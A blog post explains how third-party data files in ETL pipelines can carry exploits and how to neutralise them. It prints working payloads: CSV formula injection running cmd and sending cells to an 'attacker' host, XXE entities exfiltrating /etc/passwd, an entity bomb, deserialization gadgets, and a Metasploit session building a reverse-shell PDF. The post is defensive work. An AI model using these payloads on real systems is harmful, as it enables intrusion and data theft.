Beware of Exploits in ETL

Boris Reitman
13 min readApr 27, 2021

--

At my company we receive data from third-party vendors. This data comes in various formats: XML, CSV, Excel, PDF, and JSON, and we use an Extract-Transform-Load (ETL) process to store the data in our database. This kind of ETL process is used by many organizations that ingest data from external sources. What are the security considerations pertaining to this process?

The security issue is that a third party may unintentionally provide data laden with exploits. This can happen if the third party accumulates but does not filter free-form data submitted by users. Such data may include names, street addresses or free-form descriptions. The exploits would be innocuous at rest but would weaponize once data is extracted for manual viewing.

For instance, if a cell in a CSV file starts with an equal sign = then Excel would interpret the cell as a formula to be executed. For instance, consider this CSV:

Date,First Name,Last Name
2020-07-25,John,Smith
2020-07-25,Marry,Poppins
2020-07-25,"=2+5", Math

Unfortunately, quotes around the cell value do not help to neutralize this effect. Both the Apple Numbers and Microsoft Excel apps would render the rogue cell as “7,” despite the quoted "=2+5". In addition, the following characters can trigger formula evaluation: +, -, @. The rendered table would look like this:

The formulas also allow running external commands in the underlying operating system. For example, each of these CSV lines would trigger opening an external calculator program calc.exe,

...,=DDE("cmd";"/C calc";"__DdeLink_60_870516294"),...
...,=cmd|' /C calc'!A0,...
...,"=2+5+cmd|' /C calc'!A0",...
...,@SUM(cmd|'/c calc' !A0),...

There would be warnings from Excel before running external commands, but attackers rely on users’ tendency to ignore security warnings in files downloaded from trusted sources.

Special functions that create hyperlinks allow attackers to steal data from a CSV file. If a CSV file contains the following value in a cell, then upon opening it in Excel a user would see a link with the text “Error: please click for further information” in the corresponding cell inside the app. Upon clicking the link, he would submit the contents of cells A10 and A11 to the attacker. Those cells may contain sensitive information, such as payment details.

...,=HYPERLINK("http://attacker?leak="&A10&A11,"Error: please click for further information"),...

Neither Google Sheets web app is immune from such attacks. For instance, the IMPORTXML(url, xpath) function (documentation here ) would fetch data from the provided URL and insert it into the current sheet. Consider what would happen when importing the following CSV into Google Docs,

...,"=IMPORTXML(CONCAT(""http://attacker?v="", CONCATENATE(A2:E2)), ""//a"")",...

The result would be that data in the 2nd row of the spreadsheet spanning cells A2 through E2 would be submitted to the attacker.

But it gets worse. The URL could also be another spreadsheet in your account. By using this technique twice the attacker can exfiltrate data from any other spreadsheet in your Google Docs account if he knows its URL.

A suggested workaround for these attacks is to prefix each of the special characters =,+,-,@ in the CSV with a tab character. This neutralizes the attacks when viewing the data in Excel and other spreadsheet apps, however, note that the data is no longer in its original form.

Also, PDF files are widely used to export reports from administrative websites. If you use libraries like tabula-py to extract CSVs from such PDFs, then the extracted data can have exploits mentioned earlier.

Full control of data file generation

So far we have looked at the situation in which data contains latent exploits in a regular data file. However, if an attacker can manufacture a data file in full, then he can do far more damage. The challenge for him, however, is to deliver such a file to the victim.

If you receive data files from third parties, then a failure to authenticate the sender makes you subject to fishing attacks. If you are receiving data files by email, you may be getting them from an impostor. If you are receiving files by submission to your API, ensure that the third party is using an authentication token. If you are downloading data from a third party, verify its SSL certificate even if the third party is using a self-signed one. (On tips on how to do that read our earlier Smarking blog post.)

The attacker can also gain control of the data file generation code. This can be accomplished by poisoning public code repositories. The simplest of such attacks is publishing a misspelled variants of popular packages hoping that users would install them by accident. For instance, In 2018 a researcher found a malicious package ‘dajngo’ in the Python’s PyPi repository which is an intentional misspelling of the popular package ‘django.’

By infecting generated data files rather than the system hosting malicious code the attacker delays detection. A malicious data file can introduce a discrepancy into ETL which may be manually reviewed only weeks later. The malicious data file would be downloaded and opened by the victim, thereby infecting his system. Thus, API exploits can infect hundreds if not thousands of API consumers until the issue is identified at the API source. Each infection could open a reverse tunnel to the attacker creating a pivot for further network infiltration.

Excel files

Much like CSV files, Excel files are subject to formula-based exploits. But in addition to that, attackers can do more tricks with an Excel file. A single Excel file can encode multiple worksheets some of which may be hidden. Excel files can also specify font size and font color for particular cells and this feature can be used to hide values by using a white font. The cells have a specific data type associated with them.

Starting from version 4.0 of Excel has support for new kinds of macros. While standard formulas are limited to workbook-related calculations, the new XL4 macros allow extensive, Turing-complete, programming. In order to work, they must reside on a macro-enabled sheet.

There are other behaviour differences between a CSV and an Excel file. An Excel file would automatically open in the Excel app when double-clicked, but CSV files would open in the default spreadsheet app on the user’s system (The “Numbers” app on a Mac). Excel files may also be from an older version of Excel in which case the installed Excel app would attempt to import them. This variety of behaviors creates a larger attack surface for Excel data files than for CSV files.

Security at VMware surveyed XL4 exploits in the wild and presented a report in November of 2020. They demonstrate how the macros can be used to download files from the internet, to execute PowerShell scripts, and change the Windows registry.

The XL4 macro sequence begins to run from a cell immediately under a cell labeled Auto_Open and descends lower and lower until there are no more cells with commands. A =GOTO statement can direct the program flow to any cell. Combined with FORMULA.FILL which can write any value into a cell (including an = command), the GOTO can be directed to jump to a dynamic location. This allows you to implement flow control such as loops and if statements, making the attacker's script Turing complete.

The attackers can obfuscate their code so that it does not look like a program. The GOTO jumping function can be used to obfuscate code by scattering it all over the spreadsheet, including cells not in view. White font can make the cells appear blank. Dynamic code can be generated at run-time by deobfuscating data in cells and converting them into code. Code can also be downloaded from the Internet at runtime, then pasted into a temporary cell and executed.

As stated earlier, in order for the XL4 macros to work they must reside on a macro-enabled sheet. Security measures are already in place to alert about the presence of such sheets. However, an attacker can prepare an Excel file without the macro designation, and try to trick the user to manually enable it. For instance, this kind of Excel document was observed in the wild:

fishing page

XML, JSON and YAML

XML files can be exploited using Processing Instructions (PI). These are instructions like <!DOCTYPE html> which can cause XML parsers to load files from the file system and to generate HTTP requests. For instance, the following XML file instructs to load a local file and insert it into its own body:

<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>

If the attacker could trigger an error that is reported back to him by the XML parser, then the contents of the file might be included in the error message thereby leaking data to the attacker. Modifying the URL to http://example.com/foo.xml protocol would load a remote file from the Internet.

Using these techniques an attacker could steal data or perform a Server-side Request Forgery (SSRF) attack to bypass firewalls. The following XML and DTD combination sends the contents of /etc/passwd file to the attacker:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
%dtd;
]>
<root>&send;</root>

where evil.dtd file is:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>">
%all;

The attacker can also cause a Denial of Service attack by loading a large file:

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "http://attacker/huge.xml" >
]>
<root>&file;</root>

Entity expansions can be used to occupy gigabytes of memory using a short XML document. The following scheme would expand to occupy an exponentially large amount of memory relative to the number of lines used,

<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>

Many XML processing libraries can parse gzip compressed streams. Some of these libraries are also vulnerable to compression bombs (1GB of zeros can be compressed to a 1MB data stream).

In addition, XML parses have vulnerabilities that are triggered by malformed XML documents. For instance, a large amount of unclosed nested tags XML tags as shown below would exhaust the computer’s resources.

<A1>
<A2>
<A3>
...
<A30000>

Unfortunately XML libraries across various languages do not handle such attacks. The Python lxml library would dutifully load a local file from the filesystem and the xmlrpc library would be subject to the memory blowup attack. However, there are specialized libraries such as DefusedXML that correctly handle such attacks. Use these libraries when working with untrusted data.

If you are writing an XML parser yourself, use the following guidelines to limit the attack surface: limit parse depth, limit parse time, skip DTDs, and do not expand entities. Also, do not run XPath expressions from untrusted sources and do not apply XLS transformations received from untrusted sources.

Many API interfaces expect and return data in JSON or XML formats which contain records as key-value maps. The records are then stored in a database that many records. Whenever the records are exported from the database into a CSV report for analysis, the resulting files would lead to attacks that we have already seen.

Rogue content can get into JSON and XML through an injection attack. This attack is similar to the familiar SQL injection but it operates on JSON and XML. The following would be an unsafe way to build a JSON document containing a password:

json = `{..., "password":"${password}"}`

That is because a password can have quotes, commas, and colons inside it, arranged to generate new keys in the resulting JSON. Instead, use a library that would properly escape values.

Many languages have libraries to save or serialize objects in JSON, XML, and Yaml files and then to restore them later in a process called “deserialization.” By design, this means that data files would embed names of objects’ types and objects’ states. Thus, if an attacker could cause deserialization of rogue data, then he would gain remote code execution. For instance, loading the following YAML file with Python’s yaml.load(filename) would create a new object of type Foo with name parameter "bar."

!!python/object:__main__.Foo {name: Bar}

Python’s Yaml library is one of many data loaders which has a secondary ability to deserialize objects. A study in 2017 [Bechler] cataloged dozens of Java libraries vulnerable to such deserialization attacks. The study reported that if the following file is parsed by Java’s XMLDecoder decoder, then it would create the attacker's specified object and call a method on it. In the following example, it would run an external command /usr/bin/gedit using method start of the ProcessBuilder object which would first be created.

<new class="java.lang.ProcessBuilder">
<string >/usr/bin/gedit </string> <method name="start" />
</new >

Also, the same study showed that a vulnerablity in Apache Camel’s SnakeYAML library (CVE-2017–3159) allowed an attacker to run arbitrary scripts inside Java’s ScriptEngine object:

!! javax . script . ScriptEngineManager [
!! java . net . URLClassLoader [[
!! java . net . URL [" http :// attacker /"]
]]
]

PDF Files

Much like MS Office files, PDF files are notorious delivery vehicles for exploits. For instance, last September a use-after-free bug was discovered in a cache data structure used by Adobe Reader. It lead to a code execution exploit CVE-2020–9715.

PDF files have a large attack surface. They contain JavaScript in order to power PDF-based forms. Also, the PDF standard allows embedding arbitrary file attachments, making a PDF document equivalent to an uncompressed “zip” file. Using such attachments the attacker can easily embed exploit payloads inside the PDF and then extract them using a small amount of embedded JavaScript. For instance, the CVE-2018–8414 exploit used this technique to embed XML files into a PDF.

It is simple to add embed files inside a PDF. The following command appends an attachment data.bin containing raw binary data to page 27 of a PDF document,

$ pdftk manual.pdf attach_files data.bin to_page 27 output manual_plus.pdf

For security reasons, modern PDF readers do not automatically execute embedded JavaScript scripts. But in 2010 a security researcher Didier Stevens found that it is possible launch an external program with /Launch /Action command sequence to gain code execution in the host operating system. Acrobat Reader showed a warning but Didier found a way to alter the message text in order to trick users to ignore it.

You can replicate Didier’s technique using Metasploit, a security researcher’s tool which attackers also use. Didier’s technique was implemented as Metasploit module adobe_pdf_embedded_exe_nojs, whose documentation states:

This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack. [It] does not require JavaScript to be enabled and … [the] EXE is embedded in the PDF in a non-standard method using HEX encoding. Target: Adobe Reader <= v9.3.3 (Windows XP SP3 English)

Although this particular exploit is non-viable for current versions of PDF readers, the approach can be reused in future exploits. In addition, Metasploit has other PDF exploits:

> search type:exploit platform:windows name:pdf
... exploit/windows/fileformat/foxit_reader_uaf ... 2018-04-20

A possible defense from PDF exploits is to preprocess all untrusted PDF files and strip everything but the static content inside the PDF. This can be accomplished with the following GhostScript command:

$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf original.pdf

Note that any copyable text inside the PDF would not be by made uncopyable. A discussion on StackOverflow suggests adding options to downsample any embedded images to remove exploits that utilize flaws in image processing libraries.

A simple text search inside the PDF file would not find all suspicious active components because attackers obfuscate them. Instead, one can use Didier’s tool pdfid to triage PDF documents and to analyze the suspicious ones with his pdf-parser tool.

The following example shows how to generate a malicious PDF and then neutralize it:

$ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set lhost 1.2.3.4
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > set filename malicious.pdf
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe_nojs) > exploit
...
$ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOUTPUTFILE=clean.pdf malicious.pdf
$ python pdfid.py malicious.pdf > malicious.txt
$ python pdfid.py clean.pdf > clean.txt
$ diff --width 80 --side-by-side malicious.txt clean.txt
PDFiD 0.2.7 malicious.pdf | PDFiD 0.2.7 clean.pdf
PDF Header: %PDF-1.5 | PDF Header: %PDF-1.7
obj 5 | obj 7
endobj 5 | endobj 7
stream 0 | stream 2
endstream 0 | endstream 1
xref 1 xref 1
trailer 1 trailer 1
startxref 1 startxref 1
/Page 1(1) | /Page 1
/Encrypt 0 /Encrypt 0
/ObjStm 0 /ObjStm 0
/JS 0 /JS 0
/JavaScript 0 /JavaScript 0
/AA 0 /AA 0
/OpenAction 1(1) | /OpenAction 0
/AcroForm 0 /AcroForm 0
/JBIG2Decode 0 /JBIG2Decode 0
/RichMedia 0 /RichMedia 0
/Launch 1(1) | /Launch 0
/EmbeddedFile 0 /EmbeddedFile 0
/XFA 0 /XFA 0
/Colors > 2^24 0 /Colors > 2^24 0

Final Thoughts

We have seen that the attack surface of data processing libraries differs from the attack surface of data viewing applications. There is a fundamental difference between data for machines and data for people. We have also seen that if the attacker can fully control the data file creation, then he can cause much more damage.

When working with data received from a third party it is not known how well the third party checks data submitted by its users. The first step to protect yourself from exploits is to drop superfluous elements from a third party’s data during the transformation stage of the ETL process. For instance, if fields titled “Description” and “Street Address” are not needed, then they can be filtered out on import.

Filter out unnecessary characters from fields. A street address does not need to have =, +, @ characters, and most data values never need to begin with those characters. When exporting data from your own database into CSV and PDF reports for manual viewing, simplify the data by removing all unusual characters since the report need not have data in the precise original form.

Anonymize datasets to remove Personal Identifiable Information (PII). This further reduces the attack surface because any user-submitted values are replaced by anonymized equivalents.

Finally, use Virtual Machines when opening unsafe files. Virtual Box or remote instances on Amazon AWS can be used for working with unsafe data files. As of 2021, AWS supports both Windows and Mac OS virtual workstations. Running ETL jobs in Docker also helps prevent any exploits from escaping into the underlying operating system.

At my company, we ingest millions of records from parking vendors and we use such techniques to fend off exploits.

Additional Reading

  • [Mauer] “The Absurdly Underestimated Dangers of CSV Injection,” George Mauer, 2017 (link)
  • OWASP “XML Security Cheat Sheet” (link)
  • [Bechler] “Java Unmarshaller Security: Turning your data into code execution”, Moritz Bechler, 2017

--

--

Boris Reitman

The course of history is determined by the spreading of ideas. I’m spreading the good ones.